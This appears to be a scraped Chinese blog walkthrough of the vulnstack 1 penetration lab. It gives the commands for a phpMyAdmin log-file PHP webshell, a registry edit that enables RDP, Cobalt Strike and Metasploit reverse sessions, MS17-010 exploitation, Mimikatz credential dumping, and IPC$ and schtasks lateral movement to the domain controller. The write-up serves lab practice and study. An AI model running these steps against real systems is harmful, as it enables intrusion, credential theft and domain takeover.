当前位置: 首页 > news >正文

红日(vulnstack)1 内网渗透ATTCK实战

环境准备

靶机链接:百度网盘 请输入提取码

提取码:sx22

攻击机系统:kali linux 2022.03

网络配置:

win7配置:

kali配置:

kali 192.168.1.108 192.168.111.129 桥接一块,自定义网卡4

win7 192.168.111.128 192.168.52.143 自定义网卡4,自定义网卡3

win8 192.68.52.138 自定义网卡3

win2003 192.168.52.141 自定义网卡3

外网web渗透

1.用dirsearch进行目录扫描

dirsearch -u 192.168.111.128 --exclude-status 400,401,403,404,405,501,503

2.访问后,发现网站绝对路径。

3.访问网址是phpmyadmin的

4.工具爆破用户名密码,成功登录

5.查看是否已开启general 日志

show variables like '%general%';

6.使用set global general_log=on开启general 日志

开启之后数据库所有运行的日志会记录在general_log_file中

7.设置指定日志写入到网站根目录的 111.php 文件

set global general_log_file = 'C:/phpStudy/WWW/l.php';

8.将一句话木马写入 111.php 文件中:

SELECT '<?php eval($_POST[cmd]);?>'

9.蚁剑成功连接,关闭防火墙

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

10.rdesktop 192.168.111.128 远程连接成功

内网渗透

信息收集

1.开启cs,生成木马,上传到蚁剑,执行

2.成功上线cs.进行信息收集

3.发现一个192.168.52.143的网段

4.打印路由信息

5.查看arp信息

6.能都成功ping通52段

渗透2003

1.设置派生监听

2.将cs的shell派生(foreign)到msf

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.111.129
set lport 9999
run

3.进行提权操作,再进行添加路由

getsystem

run autoroute -s 192.168.52.0/24

run autoroute -p

4.设置代理

use auxiliary/server/socks_proxy

set srvhost 192.168.111.129

run

5.用ms17-010的use2进行渗透

use 2

set rhosts 192.168.52.141

run

6.成功执行,whomi发现是系统权限。

set command whoami

拿下域控

信息收集

1.主机名为stu1,有四个用户

2.查看域用户

shell net user /domain

3.查看域中的主机名

shell net group "domain computers" /domain

4.查看域控制器主机名

shell net group "domain controllers" /domain

域控名字OWA$

5.查看域控制器的主机名,DNS服务器的地址

shell nslookup -type=srv _ldap._tcp

ipc横向移动

1.创建一个smb监听

创建一个windows exe s 木马,选择smb监听

2.run mimikakz,得到域控密码

3.建立公网主机和域控主机的ipc信任

shell net use \\192.168.52.138\ipc$ "Qwer1234" /user:god\administrator

4.net use 发现建立成功后,上传木马程序

6.利用ipc将木马传到域控上

shell copy beacon.exe \\192.168.52.138\c$

7.创建计划任务并执行

shell schtasks /create /s 192.168.52.138 /tn msbtest /sc onstart /tr c:\beacon.exe /ru system /f

shell schtasks /run /s 192.168.52.138 /i /tn "msbtest"

/s 指定目标ip

/tn 指定计划任务名字

/sc onstart 设定开机启动

/tr 启动应用路径

/ru system 以管理员身份运行

8.link 192.168.52.138 成功上线cs,执行shell whoami 管理员权限,成功拿下!

http://www.lryc.cn/news/22902.html

相关文章:

  • ik 分词器怎么调用缓存的词库
  • ROS1/2机器人操作系统与时间Time的不解之缘
  • 华为OD机试真题2022(JAVA)
  • 【3】MyBatis+Spring+SpringMVC+SSM整合一套通关
  • 20道前端高频面试题(附答案)
  • android EditText设置后缀
  • prometheus+cadvisor监控docker
  • 正演(1): 二维声波正演模拟程序(中心差分)Python实现
  • 珠海数据智能监控器+SaaS平台 轻松实现SMT生产管控
  • 习题22对前面21节的归纳总结
  • 使用Vite快速构建前端React项目
  • 人工智能高等数学--人工智能需要的数学知识_微积分_线性代数_概率论_最优化---人工智能工作笔记0024
  • 阿里大数据之路总结
  • ABAP中Literals的用法(untyped literal vs. typed literal)
  • tensorflow1.14.0安装教程
  • C++赋值运算符重载
  • 网络性能总不好?专家帮你来“看看”— CANN 6.0 黑科技 | 网络调优专家AOE,性能效率双提升
  • Qss自定义属性
  • 连接金蝶云星空,数据交互轻松搞定!丨三叠云
  • JSX是什么,React为什么使用JSX,babel怎么转译JSX的
  • 从工地转行软件测试,拿下13k+年终奖是种什么体验?
  • 前端面试题 —— 计算机网络(二)
  • 山东大学机器学习期末2022
  • FEBC2022|打造VR内容生态闭环 佳创视讯持续加码轻量化内容建设
  • Redis常见的数据类型命令
  • Python3+Selenium3自动化测试-(准备)
  • VUE的安装和创建
  • ETL工具(kettle) 与 ETL产品(BeeloadBeeDI) 差之毫厘,谬以千里
  • 轻松入门H3C无线AC上线AP【入门篇】
  • 尚医通(二十五)就医提醒和预约统计